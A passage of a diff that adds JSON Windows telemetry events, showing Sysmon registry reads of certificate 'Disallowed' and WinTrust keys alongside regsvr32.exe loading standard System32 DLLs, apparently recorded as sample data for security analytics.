"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 